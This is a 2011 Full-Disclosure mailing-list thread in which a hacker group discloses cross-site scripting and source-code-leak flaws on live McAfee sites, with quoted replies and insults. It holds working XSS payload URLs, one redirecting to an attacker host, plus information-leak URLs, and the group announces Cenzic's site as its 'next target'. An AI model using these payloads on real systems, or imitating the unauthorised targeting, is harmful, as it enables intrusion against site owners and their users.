 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

 #yehg [2011-03-27]

 ___

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[YGN Ethical Hacker Group]

According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //


You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> FIY
>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
>
> 2011/3/28 Pablo Ximenes :
>> blog post about this: http://ximen.es/?p=469
>>
>> Please, don't throw stones at me.
>>
>> []'s
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>> 2011/3/27 YGN Ethical Hacker Group 
>>>
>>> Vulnerabilities in *McAfee.com
>>>
>>>
>>> 1. VULNERABILITY DESCRIPTION
>>>
>>> -> Cross Site Scripting
>>>
>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>>>
>>> -> Information Disclosure > Internal Hostname:
>>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>>
>>>    ($ ruby host-extract.rb -a
>>> http://www.mcafee.com/js/omniture/omniture_profile.js)
>>>
>>> -> Information Disclosure > Source Code Disclosure:
>>>
>>>
>>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>>>
>>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>>>
>>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>>>        view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>>        view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>>
>>>  view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>>        view-source:http://download.mcafee.com/updates/updates.asp
>>>        view-source:http://download.mcafee.com/updates/superDat.asp
>>>        view-source:http://download.mcafee.com/eval/evaluate2.asp
>>>        view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>>
>>>  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>>>        view-source:http://download.mcafee.com/common/ssi/variables.asp
>>>
>>>  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>>>        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>>>        view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>>>
>>>  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>>>        view-source:http://download.mcafee.com/us/bannerAd.asp
>>>
>>>  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>>>
>>>
>>> 2. RECOMMENDATION
>>>
>>> - Fully utilize Mcafee FoundStone Experts
>>> - Use outbound monitoring of traffic to detect potential information
>>> leakage
>>>
>>>
>>> 3. VENDOR
>>>
>>> McAfee Inc
>>> http://www.mcafee.com
>>>
>>>
>>> 4. DISCLOSURE TIME-LINE
>>>
>>> 2011-02-10: reported vendor
>>> 2011-02-12: vendor replied "we are working to resolve the issue as
>>> quickly as possible"
>>> 2011-03-27: vulnerability found to be unfixed completely
>>> 2011-03-27: vulnerability disclosed
>>>
>>>
>>> 5. REFERENCES
>>>
>>> Original Advisory URL:
>>>
>>> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
>>> Former Disclosure, 2008:
>>> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
>>> Former Disclosure, 2009:
>>>
>>> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
>>> Former Disclosure, 2010:
>>>
>>> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
>>> host-extract: http://code.google.com/p/host-extract/
>>> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
>>> xssed: http://www.xssed.com/search?key=mcafee.com
>>> Lessont Learn:
>>> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>>>
>>> #yehg [2011-03-27]
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and 

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Pablo Ximenes]

FIY

http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes


Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes




2011/3/28 Pablo Ximenes :
> blog post about this: http://ximen.es/?p=469
>
> Please, don't throw stones at me.
>
> []'s
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
> 2011/3/27 YGN Ethical Hacker Group 
>>
>> Vulnerabilities in *McAfee.com
>>
>>
>> 1. VULNERABILITY DESCRIPTION
>>
>> -> Cross Site Scripting
>>
>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>>
>> -> Information Disclosure > Internal Hostname:
>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>
>>    ($ ruby host-extract.rb -a
>> http://www.mcafee.com/js/omniture/omniture_profile.js)
>>
>> -> Information Disclosure > Source Code Disclosure:
>>
>>
>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>>
>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>>
>>  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>>        view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>        view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>
>>  view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>        view-source:http://download.mcafee.com/updates/updates.asp
>>        view-source:http://download.mcafee.com/updates/superDat.asp
>>        view-source:http://download.mcafee.com/eval/evaluate2.asp
>>        view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>
>>  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>>        view-source:http://download.mcafee.com/common/ssi/variables.asp
>>
>>  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>>        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>>        view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>>
>>  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>>        view-source:http://download.mcafee.com/us/bannerAd.asp
>>
>>  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>>
>>
>> 2. RECOMMENDATION
>>
>> - Fully utilize Mcafee FoundStone Experts
>> - Use outbound monitoring of traffic to detect potential information
>> leakage
>>
>>
>> 3. VENDOR
>>
>> McAfee Inc
>> http://www.mcafee.com
>>
>>
>> 4. DISCLOSURE TIME-LINE
>>
>> 2011-02-10: reported vendor
>> 2011-02-12: vendor replied "we are working to resolve the issue as
>> quickly as possible"
>> 2011-03-27: vulnerability found to be unfixed completely
>> 2011-03-27: vulnerability disclosed
>>
>>
>> 5. REFERENCES
>>
>> Original Advisory URL:
>>
>> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
>> Former Disclosure, 2008:
>> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
>> Former Disclosure, 2009:
>>
>> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
>> Former Disclosure, 2010:
>>
>> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
>> host-extract: http://code.google.com/p/host-extract/
>> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
>> xssed: http://www.xssed.com/search?key=mcafee.com
>> Lessont Learn:
>> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>>
>> #yehg [2011-03-27]
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Pablo Ximenes]

blog post about this: http://ximen.es/?p=469

Please, don't throw stones at me.

[]'s


Pablo Ximenes
http://ximen.es/
http://twitter.com/pabloximenes



2011/3/27 YGN Ethical Hacker Group 

> Vulnerabilities in *McAfee.com
>
>
> 1. VULNERABILITY DESCRIPTION
>
> -> Cross Site Scripting
>
> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in
> ')
>
> -> Information Disclosure > Internal Hostname:
>http://www.mcafee.com/js/omniture/omniture_profile.js
>
>($ ruby host-extract.rb -a
> http://www.mcafee.com/js/omniture/omniture_profile.js)
>
> -> Information Disclosure > Source Code Disclosure:
>
>view-source:
> http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>view-source:
> http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>view-source:
> http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>view-source:http://download.mcafee.com/clinic/Includes/common.asp
>view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>view-source:
> http://download.mcafee.com/updates/common/dat_common.asp
>view-source:http://download.mcafee.com/updates/updates.asp
>view-source:http://download.mcafee.com/updates/superDat.asp
>view-source:http://download.mcafee.com/eval/evaluate2.asp
>view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>view-source:
> http://download.mcafee.com/common/ssi/errHandler_soft.asp
>view-source:http://download.mcafee.com/common/ssi/variables.asp
>view-source:
> http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>view-source:
> http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>view-source:http://download.mcafee.com/us/bannerAd.asp
>view-source:
> http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>
>
> 2. RECOMMENDATION
>
> - Fully utilize Mcafee FoundStone Experts
> - Use outbound monitoring of traffic to detect potential information
> leakage
>
>
> 3. VENDOR
>
> McAfee Inc
> http://www.mcafee.com
>
>
> 4. DISCLOSURE TIME-LINE
>
> 2011-02-10: reported vendor
> 2011-02-12: vendor replied "we are working to resolve the issue as
> quickly as possible"
> 2011-03-27: vulnerability found to be unfixed completely
> 2011-03-27: vulnerability disclosed
>
>
> 5. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
> Former Disclosure, 2008:
> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
> Former Disclosure, 2009:
>
> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
> Former Disclosure, 2010:
>
> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
> host-extract: http://code.google.com/p/host-extract/
> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
> xssed: http://www.xssed.com/search?key=mcafee.com
> Lessont Learn:
> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>
> #yehg [2011-03-27]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Cal Leeming]

GROUP HUG!

On Sun, Mar 27, 2011 at 9:02 PM,  wrote:

> > On Sun, Mar 27, 2011 at 7:45 PM,   wrote:
> >>> Vulnerabilities in *McAfee.com
> >>
> >> Am I right? Do they offer "Verified by McAfee" security services but are
> >> too lazy to fix their own shit? If so, LOL :D
> >
> > Maybe you should grow up you little twerp.
> >
> > Andrew
> >
> >
> >
> >
>
> Are you trying to make love with me? No thanks.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[nix]

> On Sun, Mar 27, 2011 at 7:45 PM,   wrote:
>>> Vulnerabilities in *McAfee.com
>>
>> Am I right? Do they offer "Verified by McAfee" security services but are
>> too lazy to fix their own shit? If so, LOL :D
>
> Maybe you should grow up you little twerp.
>
> Andrew
>
>
>
>

Are you trying to make love with me? No thanks.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[nix]

> Vulnerabilities in *McAfee.com
>
>

Am I right? Do they offer "Verified by McAfee" security services but are
too lazy to fix their own shit? If so, LOL :D


> 1. VULNERABILITY DESCRIPTION
>
> -> Cross Site Scripting
>
> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>
> -> Information Disclosure > Internal Hostname:
> http://www.mcafee.com/js/omniture/omniture_profile.js
>
> ($ ruby host-extract.rb -a
> http://www.mcafee.com/js/omniture/omniture_profile.js)
>
> -> Information Disclosure > Source Code Disclosure:
>
>   
> view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>   
> view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>   
> view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>   view-source:http://download.mcafee.com/clinic/Includes/common.asp
>   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>   view-source:http://download.mcafee.com/updates/common/dat_common.asp
>   view-source:http://download.mcafee.com/updates/updates.asp
>   view-source:http://download.mcafee.com/updates/superDat.asp
>   view-source:http://download.mcafee.com/eval/evaluate2.asp
>   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>   view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>   view-source:http://download.mcafee.com/common/ssi/variables.asp
>   
> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>   view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>   view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>   
> view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>   view-source:http://download.mcafee.com/us/bannerAd.asp
>   
> view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>
>
> 2. RECOMMENDATION
>
> - Fully utilize Mcafee FoundStone Experts
> - Use outbound monitoring of traffic to detect potential information
> leakage
>
>
> 3. VENDOR
>
> McAfee Inc
> http://www.mcafee.com
>
>
> 4. DISCLOSURE TIME-LINE
>
> 2011-02-10: reported vendor
> 2011-02-12: vendor replied "we are working to resolve the issue as
> quickly as possible"
> 2011-03-27: vulnerability found to be unfixed completely
> 2011-03-27: vulnerability disclosed
>
>
> 5. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
> Former Disclosure, 2008:
> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
> Former Disclosure, 2009:
> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
> Former Disclosure, 2010:
> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
> host-extract: http://code.google.com/p/host-extract/
> Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
> xssed: http://www.xssed.com/search?key=mcafee.com
> Lessont Learn:
> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
>
> #yehg [2011-03-27]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vulnerabilities in *McAfee.com

[YGN Ethical Hacker Group]

Vulnerabilities in *McAfee.com


1. VULNERABILITY DESCRIPTION

-> Cross Site Scripting
   
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

-> Information Disclosure > Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js   

($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)

-> Information Disclosure > Source Code Disclosure:


view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp 
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp

view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp

view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp

view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


2. RECOMMENDATION

- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information leakage


3. VENDOR

McAfee Inc
http://www.mcafee.com


4. DISCLOSURE TIME-LINE

2011-02-10: reported vendor
2011-02-12: vendor replied "we are working to resolve the issue as
quickly as possible"
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn: 
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

#yehg [2011-03-27]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/